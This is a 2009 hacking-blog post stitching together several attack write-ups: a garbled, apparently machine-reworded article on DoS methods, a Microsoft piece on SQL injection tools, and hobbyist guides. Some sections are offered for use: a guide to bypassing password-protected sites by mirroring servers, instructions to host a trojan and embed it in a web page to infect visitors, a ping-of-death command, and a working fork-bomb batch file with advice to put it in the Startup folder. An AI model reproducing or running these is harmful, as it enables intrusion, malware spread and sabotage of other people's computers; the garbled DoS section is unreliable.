Latest News

attack method(5)

Saturday, October 17, 2009 , Posted by hang at 6:13 AM

 Seven Common DoS Attack Methods

Hackers have an armory of methods to pass Denial of Service (DoS) attacks. The following seven sections emphasize the degree of the quandary faced by organizations trying to battle the DoS threat. TippingPoint provides solutions to battle these common methods of DDoS attacks:

� Vulnerabilities
� Zombie Staffing
� Attack Tools
� Bandwidth Attacks
� SYN Floods
� Established Connection Floods
� Connections-Per-Second Floods

Method 1 � Vulnerabilities

Attackers can effort to collide a service or fundamental operating system in a straight line through a network. These attacks immobilize services by exploiting shock absorber spread out and other accomplishment dodge that exist in defenseless servers. Vulnerability attacks do not want widespread resources or bandwidth to commit; attackers only need to know of the survival of a susceptibility to be able to develop it and cause widespread injure. Once an attacker has control of a vulnerable service, request, or operating system, they abuse the opening to immobilize systems and in the end crash an whole network from within. 

Method 2 � Zombie Conscription

The same vulnerabilities used to collide a server allow hackers to change vulnerable PCs into Distributed Denial of Service zombies. Once the hacker develop the susceptibility to increase manage of the system, they plant a backdoor into the system for later use in commiting DDoS attacks. The Trojan or similar disease provides a trail into the system. Once the attacker has the path, they tenuously control the network, making the server a �Zombie� that waits for the given attack authority. Using these zombies, attackers can send a huge number of DoS and DDoS attacks with secrecy. Viruses can also be used for Zombie conscription. For instance, the MyDoom bug was designed to convert PCs into Zombies that attacked SCO and Microsoft at a prearranged time programmed into the virus. Other viruses fit backdoors that let hackers to open coordinated attacks, rising the sharing of the attacks across networks around the sphere. The following figures detail how attackers make and begin these attacks against a network.

Method 3 � Attack Tools
Through zombie recruitment, hackers use secret communication channels to contact and manage their zombie military. They can choose from hundreds of off-the-shelf backdoor programs and tradition toolsfrom websites. These tools and programs begin these attacks to penetrate and control networks as zombie armies to pass additional attacks from within. Once they have the zombie systems, they can use other tools to send a solitary command to all zombies concurrently. In some cases, commands are carried in ICMP or UDP packets that can go around firewalls. In other cases, the zombie �phones home� by making a TCP link to the master. Once the relation is created, the master can manage the Zombie.

The tools used to attack and control systems comprise:

� Tribe Flood Network (TFN) � Spotlight on Smurf, UDP, SYN, and ICMP reverberation apply for floods.
� Tribe Flood Network 2000 (TFN2K) � The updated version of TFN.
� Trinoo � Focuses on UDP floods. Sends UDP packets to chance purpose ports.
The size is configurable.
� Stacheldraht � Software tool that focuses on TCP, ACK, TCP NULL, HAVOC, DNS floods, and TCP packet floods with random headers.

DDoS Protection tools are growing both in terms of covert channel completion and in DDoS floodingmethods. New tools exploit random port numbers or work across IRC. Further, smarter tools cleverly mask flooding packets as lawful service requests and/or bring in a high degree of chance. These improvements make it more and more hard for a port-filtering device to divide attack packets from lawful traffic. 

Method 4 � Bandwidth Attacks
When a DDoS attack is opened, it can often be detected as a important change in the arithmetical work of art of the network transfer. For example, a typical system might consist of 80 percent TCP and a 20 percent mix of UDP and ICMP. A change in the arithmetical mix can be a signal of a new attack. For example, the Slammer maggot resulted in a rush of UDP packets, whereas the Welchi worm shaped a flood of ICMP packets. Such surges can be DDoS attacks or so-called zero-day attacks � attacks that develop secretvulnerabilities.

Method 5 � SYN Flood
One of the majority common types of DoS attacks is the SYN Flood. This assault can be launched from one or more attacker equipment to put out of action access to a target server. The attack use the device used to found a TCP connection. Every TCP link requires the conclusion of a three-way handclasp before it can pass data:

� Connection Request � First packet (SYN) sent from the supplicant to the server, preliminary the three-way handclasp
� Request Acknowledgement � Second packet (SYN+ACK) sent from the server to the requester
� Connection Complete � Third packet (ACK) sent from the supplicant back to the server, implementation the three-way handshake

The attack consists of a flood of unacceptable SYN packets with spoofed source IP addresses. The spoofed source address causes the target server to react to the SYN with a SYN-ACK to an unwary or absent source machine. The aim then waits for an ACK packet from the source to total the link. The ACK never comes and ties up the connection table with a awaiting connection ask for that by no means completes. The bench will rapidly fill up and devour all obtainable capital with invalid requests. While the number of link entries may differ from one server to another, tables may fill up with only hundreds or thousands of requests. The result is a denial of service since, once a table is full, the target server is unable to service lawful requests. The difficulty with SYN attacks is that each request in separation looks benign. An unacceptable ask for is very difficult to differentiate from a lawful one.

The complexity with SYN assault is that each request in separation looks caring. An invalid request is very hard to differentiate from a lawful one.


Method 6 � Established Connection Flood

An Recognized Connection Flood is an development of the SYN Flood attack that employs a array of zombies to commit a DDoS attack on a aim. Zombies found apparently lawful connections to the end server. By using a large number of zombies, each creating a large number of connections to the target, an attacker can make so many connections that the aim is no longer able to believe to lawful link requests. For example, if a thousand zombies make a thousand connections to a end server, the server have got to run a million open connections. The result is similar to a SYN Flood attack in that it devour server funds, but is even more difficult to sense.

Method 7 � Connections Per Second Floods
Connections Per Second (CPS) Flood attacks flood servers with a high rate of connections from a apparently valid source. In these attacks, an attacker or army of zombies attempts to drain server resources by rapidly setting up and ripping down TCP connections, perhaps begining a request on each link. For example, an attacker strength use his zombie army to frequently obtain the home page from a target web server. The resulting load makes the server tremendously lethargic. visit DDoS Protection

1. SQL injection

SQL Injection : "The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."

The MSRC released an advisory recently that discusses the recent SQL injection attacks and announces three new tools to help identify and block these types of vulnerabilities. The advisory discusses the new tools, the purpose of each, and the way each complements the others. The goal of this blog post is to help you identify the best tool to use depending on your role (i.e. Web Developers vs. IT administrators).

Web Developers Recommendations

* The Microsoft Source Code Analyzer for SQL Injection (MSCASI) is a static code analysis tool that identifies SQL Injection vulnerabilities in ASP code (ASP pages are the ones that have been under attack). In order to run MSCASI you will need source code access and MSCASI will output areas vulnerable to SQL injection (i.e. the root cause and vulnerable path is identified). In our view, fixing the root cause of the bug is the best way to eradicate vulnerabilities. MSCASI scans ASP source code and generates warnings for first order and second order SQL Injection vulnerabilities. Please refer to the SQL team’s blog and KB 954476 for more details.

IT/Database Administrators Recommendations (as well as Web developers)

We are recommending two of the new tools announced today. One can help identify SQL injection vulnerabilities by crawling the website. The other one aims to block potential SQL injection attacks by filtering malicious requests. The website crawler will be useful if you don't have access to the source code.

* Microsoft worked with the HP Web Security Research group to release the Scrawlr tool. The tool will crawl a website, simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr uses some of the same technology found in HP WebInspect but has been built to focus only on SQL Injection vulnerabilities. This will allow an IT/DB admin to easily find vulnerabilities similar to the ones that have been used to compromise sites in recent attacks. No source code is required to run this tool. From a starting URL, the tool recursively crawls that URL in order to build up a site tree that will be then analyzed for SQL injection vulnerabilities. For more information check out the HP Web Security Research blog.

* In order to block and mitigate SQL injection attacks (while the root cause is being fixed), you can also deploy SQL filters using a new release of URLScan 3.0. This tool restricts the types of HTTP requests that Internet Information Services (IIS) will process. By blocking specific HTTP requests, UrlScan helps prevent potentially harmful requests from being executed on the server. It uses a set of keywords to block certain requests. If a bad request is detected, the filter will drop the request and it will not be processed by SQL. That said, if a SQL injection flaw has been identified, we highly encourage you to fix the root cause of the problem instead of attempting to produce the perfect filter (since in our view this is error prone). Please refer to one of the two IIS blog posts (1, 2) and the technical documentation for more details.

Tool Name: MSCASI
Usuage:Identifies SQL Injection vulnerabilities in ASP code through static source code analysis.
Pros:Identify the root cause of the bug at the source code level.
Cons:This version currently only works on ASP pages.
For: WEB Developers


Tool Name 2: Scrawlr
Usuage:Detect SQL vulnerability using runtime analysis by crawling a website.
Pros:No source code is required.
Cons:Cannot identify the line of code responsible
For: IT/DB Administrator,Web developers

Tool Name 3: UrlScan v3.0 Beta
Usuage: Runtime filtering that blocks the types of HTTP requests that Internet Information Services (IIS) will process.
Pros: URLScan filter can be easily deployed to mitigate SQL injection attack while the root cause is being fixed.
Cons: Not fixing the root cause, thus the risk has not been eliminated completely.

For:IT Administrators
 

2. Hacking Password Protected Website's

warning : For educational purpose only

i know dis is lame but just would like to share wid u.
have nothing for next half an hour so typing it.. lol


here are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting
[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .

Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.

For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1.

We then go to 100.100.100.1, and then launch Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading.


3. TROJAN ATTACK THROUGH HTML

This was a normal html code which would create a simple webpage.

Now what you have to do is,
the server file of your trojan you will have to upload it on some webhosting and then change the link of the server file in the code and then save this code as "index.html" and then upload it to the same host.

All done, now everytime someone opens that webpage they would be infected with your trojan's server :)
http://tinypaste.com/6b4b3

expecting good replies



4. dos attacks or denial of services attack

dos attacks or denial of services attack have become very common amongst hackers
who use them as a path to fame and respect in the underground groups of the
internet. denial of service attacks basically means denying valid internet and
network users from using the services of the target network or server. it
basically means, launching an attack, which will temporarily make the services,
offered by the network unusable by legitimate users.
in others words one can describe a dos attack, saying that a dos attack is one
in which you clog up so much memory on the target system that it cannot serve
legitimate users. or you send the target system data packets, which cannot be
handled by it and thus causes it to either crash, reboot or more commonly deny
services to legitimate users.
dos attacks are of the following different types-:
those that exploit vulnerabilities in the tcp/ip protocols suite.
those that exploit vulnerabilities in the ipv4 implementation.
3 there are also some brute force attacks, which try to use up all
resources of the target system and make the services unusable.
before i go on with dos attacks, let me explain some vulnerabilities in tcp/ip
itself. some common vulnerabilities are ping of death, teardrop, syn attacks and
land attacks.
ping of death
this vulnerability is quite well known and was earlier commonly used to hang
remote systems (or even force them to reboot) so that no users can use its
services. this exploit no longer works, as almost all system administrators
would have upgraded their systems making them safe from such attacks.
in this attack, the target system is pinged with a data packet that exceeds the
maximum bytes allowed by tcp/ip, which is 65 536. this would have almost always
caused the remote system to hang, reboot or crash. this dos attack could be
carried out even through the command line, in the following manner:
the following ping command creates a giant datagram of the size 65540 for ping.
it might hang the victim's computer:
c:\windows>ping -l 65540
teardrop
the teardrop attack exploits the vulnerability present in the reassembling of
data packets. whenever data is being sent over the internet, it is broken down
into smaller fragments at the source system and put together at the destination
system. say you need to send 4000 bytes of data from one system to the other,
then not all of the 4000 bytes is sent at one go. this entire chunk of data is
first broken down into smaller parts and divided into a number of packets, with
each packet carrying a specified range of data. for example, say 4000 bytes is
divided into 3 packets, then:
the first packet will carry data from 1 byte to 1500 bytes
the second packet will carry data from 1501 bytes to 3000 bytes
the third packet will carry data from 3001 bytes to 4000 bytes
these packets have an offset field in their tcp header part. this offset field
specifies from which byte to which byte does that particular data packet carries
data or the range of data that it is carrying. this along with the sequence
numbers helps the destination system to reassemble the data packets in the
correct order. now in this attack, a series of data packets are sent to the
target system with overlapping offset field values. as a result, the target
system is not able to reassemble the packets and is forced to crash, hang or
reboot.
say for example, consider the following scenario-: (note: _ _ _ = 1 data packet)
normally a system receives data packets in the following form, with no
overlapping offset values.
_ _ _ _ _ _
_ _ _
(1 to 1500 bytes) (1501 to 3000 bytes)
(3001 to 4500 bytes)
now in a teardrop attack, the data packets are sent to the target computer in
the following format:
_ _ _ _ _ _
_ _ _
(1 to 1500 bytes) (1500 to 3000 bytes)
(1001 to 3600 bytes)
when the target system receives something like the above, it simply cannot
handle it and will crash or hang or reboot.
syn attack
the syn attack exploits tcp/ip's three-way handshake. thus in order to
understand as to how syn attacks work, you need to first know how tcp/ip
establishes a connection between two systems. whenever a client wants to
establish a connection with a host, then three steps take place. these three
steps are referred to as the three-way handshake.
in a normal three way handshake, what happens is that, the client sends a syn
packet to the host, the host replies to this packet with a syn ack packet. then
the client responds with a ack (acknowledgement) packet. this will be clearer
after the following depiction of these steps-:
client --------syn packet-------------- � Host
in the first step the client sends a syn packet to the host, with whom it wants
to establish a three-way connection. the syn packet requests the remote system
for a connection. it also contains the initial sequence number or isn of the
client, which is needed by the host to put back the fragmented data in the
correct sequence.
host -------------syn/ack packet----------� Client
in the second step, the host replies to the client with a syn/ack packet. this
packet acknowledges the syn packet sent by the client and sends the client its
own isn.
client --------------ack-----------------------� Host
in the last step the client acknowledges the syn/ack packet sent by the host by
replying with a ack packet.
these three steps together are known as the 3-way handshake and only when they
are completed is a complete tcp/ip connection established.
in a syn attack, several syn packets are sent to the server but all these syn
packets have a bad source ip address. when the target system receives these syn
packets with bad ip addresses, it tries to respond to each one of them with a
syn ack packet. now the target system waits for an ack message to come from the
bad ip address. however, as the bad ip does not actually exist, the target
system never actually receives the ack packet. it thus queues up all these
requests until it receives an ack message. the requests are not removed unless
and until, the remote target system gets an ack message. hence these requests
take up or occupy valuable resources of the target machine.
to actually affect the target system, a large number of syn bad ip packets have
to be sent. as these packets have a bad source ip, they queue up, use up
resources and memory or the target system and eventually crash, hang or reboot
the system.
land attacks
a land attack is similar to a syn attack, the only difference being that instead
of a bad ip address, the ip address of the target system itself is used. this
creates an infinite loop between the target system and the target system itself.
however, almost all systems have filters or firewalls against such attacks.
smurf attacks
a smurf attack is a sort of brute force dos attack, in which a huge number of
ping requests are sent to a system (normally the router) in the target network,
using spoofed ip addresses from within the target network. as and when the
router gets a ping message, it will route it or echo it back, in turn flooding
the network with packets, and jamming the traffic. if there are a large number
of nodes, hosts etc in the network, then it can easily clog the entire network
and prevent any use of the services provided by it.
read more about the smurf attacks at cert:
http://www.cert.org/advisories/ca-98.01.smurf.html
udp flooding
this kind of flooding is done against two target systems and can be used to stop
the services offered by any of the two systems. both of the target systems are
connected to each other, one generating a series of characters for each packet
received or in other words, requesting udp character generating service while
the other system, echoes all characters it receives. this creates an infinite
non-stopping loop between the two systems, making them useless for any data
exchange or service provision.
distributed dos attacks
dos attacks are not new; in fact they have been around for a long time. however
there has been a recent wave of distributed denial of services attacks which
pose a great threat to security and are on the verge of overtaking
viruses/trojans to become the deadliest threat to internet security. now you
see, in almost all of the above tcp/ip vulnerabilities, which are being
exploited by hackers, there is a huge chance of the target's system
administrator or the authorities tracing the attacks and getting hold of the
attacker.
now what is commonly being done is, say a group of 5 hackers join and decide to
bring a fortune 500 company's server down. now each one of them breaks into a
smaller less protected network and takes over it. so now they have 5 networks
and supposing there are around 20 systems in each network, it gives these
hackers, around 100 systems in all to attack from. so they sitting on there home
computer, connect to the hacked less protected network, install a denial of
service tool on these hacked networks and using these hacked systems in the
various networks launch attacks on the actual fortune 500 company. this makes
the hackers less easy to detect and helps them to do what they wanted to do
without getting caught. as they have full control over the smaller less
protected network they can easily remove all traces before the authorities get
there.
not even a single system connected to the internet is safe from such ddos
attacks. all platforms including unix, windows nt are vulnerable to such
attacks. even macos has not been spared, as some of them are being used to
conduct such ddos attacks.
end of dos attack....
p.humayun khan


5.How to crash a computer in less than 20 secs:

How to crash a computer in less than 20 secs:
open a text document and put this in it:
@ECHO OFF
:loop
start cmd.exe
goto loop
Save this as test.bat on a safe place. Run it and the computer will crash. Put it in the StartUp
folder and the computer will crash everytime it starts. DAMN IM EVIL :D

 

Currently have 0 comments:

Leave a Reply

Post a Comment